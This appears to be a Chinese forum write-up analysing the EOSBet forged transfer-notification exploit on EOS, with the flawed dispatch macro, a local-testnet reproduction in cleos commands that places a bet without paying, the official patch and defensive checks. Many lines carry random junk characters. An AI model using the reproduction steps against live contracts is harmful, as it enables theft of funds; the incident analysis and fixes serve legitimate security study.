EOS dApp 漏洞盘点分析—EOSBet 假充值漏洞一
蓝天天使2017
发表于 2022-12-27 17:33:36
114
0
0
文章用到的所有代码均在 https://github.com/NoneAge/EOS_dApp_Security_Incident_Analysis
0x00 背景
EOSBet在9月14日遭到黑客攻击,根据EOSBet官方通告,此次攻击共被盗44,427.4302 EOS(折合人民币160万,9月14日价格)。
9 s- g t$ Z# s* B
0x01 技术分析- w' I- |2 y) |; x [- P" k3 a3 E. R
由于EOSBet代码并未开源,但官方复盘攻击事件后给出了EOSIO_ABI
// extend from EOSIO_ABI, because we need to listen to incoming eosio.token transfers
#define EOSIO_ABI_EX( TYPE, MEMBERS ) \4 |6 C, L$ ?6 O
extern "C" { \
void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \5 J! F, A c+ a* w- \8 Y- Y; f2 r
auto self = receiver; \
if( action == N(onerror)) { \/ ~, P$ r/ T" M1 u9 ?
/* onerror is only valid if it is for the "eosio" code account and authorized by "eosio"'s "active permission */ \
eosio_assert(code == N(eosio), "onerror action's are only valid from the \"eosio\" system account"); \
} \- n* Q' N; p1 L! a1 |5 R: ^: f$ U5 K
if( code == self || code == N(eosio.token) || action == N(onerror) ) { \" r# f( |0 d& z9 m
TYPE thiscontract( self ); \
switch( action ) { \! J2 ]. w3 R* e0 A. {
EOSIO_API( TYPE, MEMBERS ) \
} \
/* does not allow destructor of thiscontract to run: eosio_exit(0); */ \
} \
} \
}
通过官方给出的EOSIO_ABI,问题主要出在以下代码) S# B) {! \0 e4 u7 f& @+ x) T |
if( code == self || code == N(eosio.token) || action == N(onerror) ) { \+ j/ f. q2 c' O# x$ e+ n
TYPE thiscontract( self ); \: x9 F* h: n- l3 c( Y3 F
switch( action ) { \9 ]$ t/ i1 z% v8 m
EOSIO_API( TYPE, MEMBERS ) \
} \
}( L0 `" o# Z' B7 q, l M2 Y. M
该合约对action进行转发的时候仅仅验证了code == self(调用者必须是该合约本身,即eosbetdice11)和code == N(eosio.token)(调用者必须是eosio.token)。从这里看似乎是验证了只有合约本身和eosio.token可以调用合约函数。5 {0 I, T$ y; X/ F
但是,开发者忽略了这一点。如果A合约直接向B合约发起一个transaction调用B合约的函数,那么本质上是B合约自身完成函数调用,也就是说任何合约都可以调用eosbetdice11合约中abi暴露的函数。$ I/ V. p: y' H. p0 T4 {
黑客可以直接调用eosbetdice11合约中的transfer函数,即不用消耗任何EOS来玩EOSBet,输了不赔赢了稳赚。" J2 `5 D1 U$ J4 f6 R! T# [
0x02 攻击复盘
创建eosio.token账户% C1 J# X( v( l- p
cleos create account eosio eosio.token EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV( e5 d) S3 t6 s/ e# C7 ]& s6 y! ~
部署eosio.token合约并初始化
# 部署合约* o5 T2 T% k4 Z" X6 m
cleos set contract eosio.token /home/user/contracts/eosio.token -p eosio
# 初始化合约
cleos push action eosio.token create '[ "eosio", "1000000000.0000 EOS", 0, 0, 0]' -p eosio.token
创建游戏账户、开奖账户和攻击者账户
#创建游戏账户和开奖账户
cleos create account eosio eosbetdice11 EOS6xKEsz5rXvss1otnB5kD1Fv9wRYLmJjQuBefRYaDY7jcfxtpVk
cleos create account eosio eosbetcasino EOS6xKEsz5rXvss1otnB5kD1Fv9wRYLmJjQuBefRYaDY7jcfxtpVk, b$ v5 O5 u; v I# x2 u$ \9 `+ n/ w
#创建攻击者账户
cleos create account eosio attacker EOS6xKEsz5rXvss1otnB5kD1Fv9wRYLmJjQuBefRYaDY7jcfxtpVk0 h$ N/ G. S5 i2 A, n: z) L! v
设置账户随机权限和开奖权限4 j4 U/ m7 Q2 p8 Y
#设置权限
cleos set account permission eosbetdice11 active '{"threshold": 1,"keys": [{"key": "EOS6xKEsz5rXvss1otnB5kD1Fv9wRYLmJjQuBefRYaDY7jcfxtpVk","weight": 1}],"accounts":[{"permission":{"actor":"eosbetdice11","permission":"eosio.code"},"weight":1}]}' owner -p eosbetdice11@owner
cleos set account permission eosbetcasino random '{"threshold": 1,"keys": [{"key": "EOS6xKEsz5rXvss1otnB5kD1Fv9wRYLmJjQuBefRYaDY7jcfxtpVk","weight": 1}],"accounts":[]}' owner -p eosbetcasino@owner3 ?' Q8 Q7 ?; @& q6 ~" \, n7 O
#设置开奖权限( l, H6 ?+ ~- A# q
cleos set action permission eosbetcasino eosbetdice11 resolvebet random- l; w& O! b! O7 W" u
向相关账户冲入代币+ v# `! ]$ J% y/ E& L
#往相关账户充值! ]4 _+ f! c6 {) y
cleos push action eosio.token issue '["attacker", "100000.0000 EOS", "memo"]' -p eosio@active
cleos push action eosio.token issue '["eosbetdice11", "100000.0000 EOS", "memo"]' -p eosio@active
![4.png]()
部署游戏合约并初始化
#部署游戏合约1 \1 h8 Q! U- K- G: c6 R, W/ R; H- s1 B
cleos set contract eosbetdice11 /home/user/contracts/eosbetdice' B) |! I' m: j) R7 N
#初始化游戏合约: H8 n$ B0 `8 e
cleos push action eosbetdice11 initcontract '{"randomness_key":"EOS6xKEsz5rXvss1otnB5kD1Fv9wRYLmJjQuBefRYaDY7jcfxtpVk"}' -p eosbetcasino+ v1 ~) Y+ C# m% F
模拟黑客攻击(伪造转账通知)
cleos push action eosbetdice11 transfer '["attacker", "eosbetdice11", "10.0000 EOS", "66-attacker-"]' -p attacker- O: U" Y% X/ ~
查询游戏订单
cleos get table eosbetdice11 eosbetdice11 activebets
可见,游戏订单已经生成,查询attacker和eosbetdice11账户1 t$ j) O7 h: r
; |' }0 N! i7 ?" d
按照游戏规则,只有在支付了EOS后才能生成游戏,但是被黑客攻击后生成订单并没有消耗任何的EOS。
最后对该订单进行开奖。& l/ h* `7 L9 O
cleos push action eosbetdice11 resolvebet '{"bet_id":"237902368081510060", "sig":"SIG_K1_K862MEbB45rMi9bvYRPbqA9F6tbrte9osUbZk3fUXXvsnf3zQRNdyYrunc4zhyQWUho2a4meho1k8kNvnrLLYdW1ge8kD1"}' -j -p eosbetcasino@random
总结,黑客伪造转账通知来玩游戏不消耗任何EOS,游戏成功即可获利,即使最后游戏失败也不会有任何损失。% U3 [ o. a+ d- j. |
0x03 后记
EOSBet随后将修复方案公开: G& \8 |4 H5 w
// extend from EOSIO_ABI, because we need to listen to incoming eosio.token transfers
#define EOSIO_ABI_EX( TYPE, MEMBERS ) \
extern "C" { \
void apply( uint64_t receiver, uint64_t code, uint64_t action ) { \
auto self = receiver; \
if( code == self || code == N(eosio.token)) { \# k. z8 D; o; H. ^$ ^5 d
if( action == N(transfer)){ \
// 必须是eosio.token来调用合约自身的transfer函数. {7 D6 d j. b# X( d- N. \
eosio_assert( code == N(eosio.token), "Must transfer EOS"); \
} \8 {- j2 e. k. F( s, P, t3 H
TYPE thiscontract( self ); \! @ d! @' L4 ^% G7 }- _ A
switch( action ) { \$ ]& E& v; Q) a* M. g; P0 }( V
EOSIO_API( TYPE, MEMBERS ) \% i; J2 O7 m7 F$ ~* K7 u2 {
} \
/* does not allow destructor of thiscontract to run: eosio_exit(0); */ \
} \2 V+ t( n6 a. T% b1 z- k o
} \1 f j9 Q7 ~; q- E- s
}
可以看到,EOSBet官方给出的修复方案是仅有eosio.token合约可以调用transfer函数。官方修复后将代码开源到Gitlab,地址为https://gitlab.com/EOSBetCasino/eosbetdice_public,但是在整整一个月后又遭到了转账通知伪造攻击。欲知详情,请听下回分解:D
0x04 修复方案: W. s2 N+ |; h$ `/ w; `
零时科技安全专家建议,要防止转账通知伪造必须在处理转账交易时要验证以下内容:( I9 G5 c. s6 W3 S
通知是否来自eosio.token,即只处理eosio.token发送的通知
eosio_assert(code == N(eosio.token), "Must transfer from eosio.token");0 b8 u6 w& V! Z6 G7 O3 x M
转账发起人或者接受人是否是自己,即转账必须跟合约本身有关,不处理其他合约的转账通知# I9 H8 l$ N8 D8 V- Q
eosio_assert(transfer.from == _self || transfer.to == _self, "Must transfer from self or transfer to self");
成为第一个吐槽的人